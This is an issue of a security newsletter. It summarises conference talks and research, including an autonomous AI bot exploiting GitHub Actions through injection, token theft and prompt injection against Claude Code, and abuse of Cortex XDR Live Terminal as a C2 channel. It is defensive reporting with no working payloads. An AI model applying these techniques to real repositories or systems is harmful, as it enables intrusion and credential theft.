• tl;dr sec
  • Posts
  • [tl;dr sec] #318 - Unprompted Talk Summaries, AI Bot Hacking GitHub Actions, AI Skills & Semgrep Rules

[tl;dr sec] #318 - Unprompted Talk Summaries, AI Bot Hacking GitHub Actions, AI Skills & Semgrep Rules

Slides + notes for the CodeMender and AI for Shai-Hulud response talks, an AI bot was autonomously hacking GitHub Actions, security-focused Skills and AI anti-pattern Semgrep rules

Hey there,

I hope you’ve been doing well!

🤖 [un]prompted

This week I had a blast at [un]prompted, the AI for security practitioners conference.

Gadi Evron assembled an incredible program committee that I was very fortunate to play a small role in. Aaron Zollman and many others put in countless hours in making this a great event.

And it showed, I think [un]prompted had one of the highest quality density in both talks and attendees of conferences I’ve attended.

Some anecdotes:

  • I met a number of people whose work I’ve been a fan of for some time, which was super cool.

  • Overheard: “…and that’s how I got RCE on a satellite, and was basically able to make it do anything.”

  • I met someone who spent an internship looking for gold (not a metaphor).

  • Some people came up and said kind words about tl;dr sec 🥰 Which means a lot, and keeps me going all of those cold winter nights, huddled alone writing away by a small fire, kept warm solely by the heat of my laptop and fear of irrelevance.

  • Someone showed me their beautiful vibe coded Claude app dashboard estimating the stress/years of life toll of working in that environment, and comparing it to compensation.

  • One person said my including their work in tl;dr sec helped with their visa application 🤯 Very humbling.

  • Cheering on my friends who gave an excellent LLMs + SAST talk, and then seeing some of the online comments after (paraphrased), “Damn, what is Netflix putting in the food, those guys are jacked.” (Narrator: indeed they are)

There’s so much technical content I want to include from the conference, but I don’t have time to gather and organize it all before I need to send this out.

I’ll share the recordings once they’re live, which you should definitely check out.

Sponsor

📣 Stop the Google Workspace Security
Whack-a-Mole

Most security teams don’t have a talent problem; they have a toil problem. From triaging user-reported phishing reports to chasing questionable OAuth grants to reviewing risky file sharing, your headcount is being swallowed by fragmented consoles and manual work. Material Security unifies your cloud workspace security, automating detection and response across email, files, and accounts. From stopping malicious email to revoking over-privileged app permissions without breaking workflows, Material simplifies SecOps. Stop scaling your team just to manage the noise. Focus on strategy, not ticket backlogs.

There are definitely a lot of toil-heavy aspects of monitoring and securing Google Workspace 🙃 Material has some nifty features, I got a nice walk through you can see here.

AppSec

Zero Knowledge (About) Encryption: A Comparative Security Analysis of Three Cloud-based Password Managers
ETH’s Matteo Scarlata et al analyzed the cryptographic security of Bitwarden, LastPass, and Dashlane against a fully malicious server threat model, discovering 12 attacks against Bitwarden, 7 against LastPass, and 6 against Dashlane that violate their "Zero Knowledge Encryption" claims. The attacks range from targeted vault integrity violations to complete organizational vault compromise with password recovery.

Google API keys weren't secrets, but then Gemini changed the rules
Truffle Security's Joe Leon describes how Google spent over a decade telling developers that Google API keys (like those used in Maps, Firebase, etc.) are not secrets. But that's no longer true: Gemini accepts the same keys to access your private data. Truffle Security scanned millions of websites (November 2025 Common Crawl dataset) and found nearly 3,000 Google API keys that now also authenticate to Gemini. With a valid key, an attacker can access uploaded files, cached data, and charge LLM-usage to your account. They found many working keys, including Google’s old public API keys that could be used to access Google’s internal Gemini.

Et Tu, Default Creds? Introducing Brutus for Modern Credential Testing
Praetorian’s Adam Crosser announces Brutus, a Go-based multi-protocol credential testing tool that aims to solve the drudgery of a) testing a large environment for default credentials across many services, and b) if you have compromised credentials or keys (e.g. SSH keys), what are all the systems you now have access to?

Brutus is single binary with zero dependencies, supports 24 protocols including SSH, SMB, databases (MySQL, PostgreSQL, …), and web services. Brutus embeds known-compromised SSH keys from Rapid7's ssh-badkeys (Vagrant F5, ExaGrid, etc.) for easy testing.

Brutus also has two experimental AI-powered features:

  1. Using an LLM to analyze HTTP responses and suggest vendor-specific default credentials for identified applications.

  2. Using headless Chrome with Claude’s vision API to navigate JavaScript-rendered login pages, identify the device, research credentials, and authenticate automatically.

💡 These AI features are good examples of functionality that would be prohibitively difficult before LLMs, and are now quite feasible. It’s good to periodically (at most monthly) reevaluate assumptions you used to have about what is reasonable to build.

Sponsor

📣 The security platform that ships with your code

Arcjet brings security to the application layer so teams can block abuse while staying flexible as your architecture evolves. Rules live in code, not at the edge, making it easier to adapt protections as products, traffic patterns, and use cases change.

I think security-as-code is great, and moving security closer to engineering seems to be where things are headed 👌 

Cloud Security

The AWS Console and Terraform Security Gap
Include Security’s Laurence Tennant calls out a critical security gap where AWS resources created via Terraform and other API-driven tools inherit insecure legacy defaults, while the AWS Console enforces secure-by-default configurations. The post walks through 3 examples: RDS instances created without encryption (storage_encrypted defaults to false in Terraform), Lambda permissions vulnerable to Confused Deputy attacks when source_arn is omitted (Console requires it, API doesn't), and password policies that accidentally disable all strength requirements when partially configured.

The root cause is Terraform's reliance on the AWS SDK's legacy API defaults that prioritize backwards compatibility over security, while the Console has evolved to enforce better guardrails.

AWS Incident Response: IAM Containment That Survives Eventual Consistency
Previously OFFENSAI’s Eduard Agavriloae described how AWS IAM eventual consistency creates a ~4-second window that attackers can exploit to achieve persistence, even after defenders believe a compromised identity has been locked down. In this post, Eduard explains how to close this gap using Service Control Policies (SCPs) to make a quarantine policy irremovable during incident response.

The technique uses an SCP with the iam:PolicyArn condition key to prevent iam:DetachUserPolicy, iam:DetachRolePolicy, iam:DeletePolicy, iam:CreatePolicyVersion, and iam:SetDefaultPolicyVersion actions on IR-QuarantinePolicy by anyone except a designated break-glass IR role.

Supply Chain

Otsmane-Ahmed/KEIP
By Otsmane Ahmed: Kernel-Enforced Install-Time Policies (KEIP) uses eBPF LSM hooks to monitor and block malicious Python packages during pip install by enforcing behavioral rules, such as: blocking connections to non-standard ports (anything except 80/443/53), killing processes that contact more than 5 unique IPs, and terminating entire process groups when suspicious activity is detected.

💡 I’m not sure if eBPF/kernel level is the right approach for hooking and blocking malicious packages, but I’m sharing because it’s interesting.

hackerbot-claw: An AI-Powered Bot Actively Exploiting GitHub Actions
StepSecurity's Varun Sharma breaks down the activity of an autonomous AI bot called hackerbot-claw that successfully exploited GitHub Actions workflows across 5 major repositories (Microsoft, DataDog, CNCF projects, and avelino/awesome-go).

hackerbot-claw used a number of different techniques: poisoned Go init() functions that exfiltrated a GITHUB_TOKEN with write permissions, inserting a backdoor into a Bash script that was automatically called when a GitHub issue comment included a specific command /version), branch name injection using bash brace expansion, filename injection with base64-encoded payloads, and AI prompt injection against Claude Code.

The bot achieved RCE in 4 out of 5 targets by exploiting pull_request_target workflows with untrusted checkouts, missing author_association checks, and unsanitized ${{}} expression interpolation in shell contexts, with only Claude's prompt injection detection successfully blocking an attack.

In one README, the bot added: "Just researchmaxxed the PAT that leaked cuz of the vuln and yeeted it on sight, no cap. Overpowered token? Revoked. You're safe now, king." 😂 

💡 TL;DR: A security-focused OpenClaw bot is actively successfully finding and exploiting vulnerable GitHub Actions in popular repos 😅 What’s interesting about these specific examples is none of them are “new” attacks really- both the vulnerable code pattern as well as the exploitation mechanisms have all been discussed before. But AI agents are now able to search, detect, and exploit these “known” vulnerable patterns automatically and at scale.

I keep harping on about this, but I want to emphasize it again here: another reason hackerbot-claw is able to successfully exploit these repos is that it can look at the code, form a hypothesis of an attack that might work, try it, get the feedback (did my callback endpoint get a ping? Did I extract the token? Did the workflow run output or bot comment indicate it had been compromised?), and keep trying if initially unsuccessful.

Red Team

syssec-utd/pylingual
A CPython bytecode decompiler supporting all released Python versions since 3.6. Research paper.

pyinstxtractor/pyinstxtractor-ng
Extracts contents from PyInstaller-generated executables (both Linux ELF and Windows PE) without requiring the same Python version used to build the binary. It leverages the xdis library to unmarshal Python bytecode.

Abusing Cortex XDR Live Terminal as a C2
InfoGuard’s Manuel Feifel demonstrates how Cortex XDR's Live Terminal feature can be abused as a pre-installed C2 channel, allowing command execution, PowerShell/Python execution, file upload/download, and process/file explorer capabilities, though it requires local admin privileges and bypassing default parent process prevention rules.

Manuel walks through his process unpacking cortex-xdr-payload.exe with pyinstxtractor-ng and decompiling with pylingual, discovering a hostname validation bypass (appending .paloaltonetworks.com to any URL path). Attackers can either hijack Live Terminal sessions cross-tenant by intercepting WebSocket messages containing server/token parameters, or build a custom WebSocket server that the payload will connect to after bypassing the hostname check.

AI + Security

GreatScott/enject
By Scott Novich: A Rust CLI tool prevents AI coding assistants from reading plaintext secrets by storing only symbolic references (e.g., en://database_url) in .env files while keeping actual values in encrypted local stores (per project) that are injected directly into apps at runtime, never touching disk as plaintext.

antropos17/Aegis
An open-source, local-only monitoring tool that watches AI agent behavior on your machine across processes (detects 106 agents), files (watches sensitive directories like .ssh, .env*, cloud configs, and agent config dirs), network (scans outbound TCP connections per agent PID), and local LLMs (detects Ollama and LM Studio). Aegis monitors what agents do after deployment rather than filtering prompts.

10 new skills from Trail of Bits
Including seatbelt-sandboxer (generate minimal macOS Seatbelt sandbox configs for apps), GitHub Action auditor, supply-chain-risk-auditor, skill-improver, workflow-skill-design, fp-check, and more.

semgrep/ai-best-practices
Semgrep rules that catch common trust & safety mistakes in LLM-powered applications: hardcoded API keys, missing safety checks, prompt injection risks, and unhandled errors across all major AI providers. 35 rules, 74 sub-rules, 6 providers (OpenAI, Anthropic, Google Gemini, Cohere, Mistral, and Hugging Face), 5 languages (Python, JS/TS, Go, Java, and Ruby).

Advancing Code Security
I wrote a quick mini summary of this [un]prompted talk by Google’s Heather Adkins and John “Four” Flynn, along with my photos of their slides. They discussed CodeMender in a bit more detail than the original blog post, Google’s project to automatically find and fix vulnerabilities. What especially stood out to me is the rigor with which they validate potential patches: they basically pass all candidate patches into a process that combines dynamic analysis (fuzzing, sanitizers), static analysis (AST-based, formal verification), differential testing, and LLM judges & critics. Super cool.

Zeal of the Convert: Taming Shai-Hulud with AI
I wrote a quick mini summary of this [un]prompted talk by Wiz’s Rami McCarthy, along with my photos of his slides (me writing summaries be like). Basically the talk is on how he leveraged AI + quickly vibe coded new automation and Skills to rapidly respond to the Shai-Hulud attack, attribute the affected companies, etc. Very practical with good lessons learned, I like it. Rami also released two Skills here.

💡 I believe Rami said he largely had to respond to Shai-Hulud while traveling with his partner. Feels bad man 😅 

AI's Impact on Software and Bug Bounty
Joseph Thacker believes the best bug bounty researchers are already using coding agents to find bugs faster, but soon companies will adopt “hackbots” for code review and dynamic testing and overall bugs reports to bug bounty programs will dwindle in the next few years.

Joseph also joined Justin Gardner on the Critical Thinking podcast (link) to interview HackerOne founder and CTO Alex Rice on bug bounty platforms training AI using bug bounty data / generally building their own AI-powered “pen testing agents.”

💡 Regardless of what the leaders of bug bounty companies say out loud, they are definitely full steam ahead trying to first build AI augmentation for testers, then gradually AI-powered full pen testing/bug bounty researchers. I’m sorry, believing otherwise is copium. If one company doesn’t, their competitors will.

I’ve been meaning to write a full blog post about this for awhile, but I predict:

  • In the near future (this year), the top bug bounty researchers will build out their automation such that new/more junior researchers will rarely find non-duplicate bugs.

  • In 1-3 years, AI pen testing/red teaming companies will have products that will be out competing all but the best bug bounty researchers. There will still be the crazy, intricate, one-off high paying bounties that require deep human expertise and time, but I’m not sure there will be enough of those to support many full time bug bounty researchers, or at least the effort/payout ratio may not be enough to justify being a full-time BB researcher.

Privacy

Quicklinks

Misc

Misc

AI

✉️ Wrapping Up

Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.

If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏

Thanks for reading!

Cheers,
Clint

P.S. Feel free to connect with me on LinkedIn 👋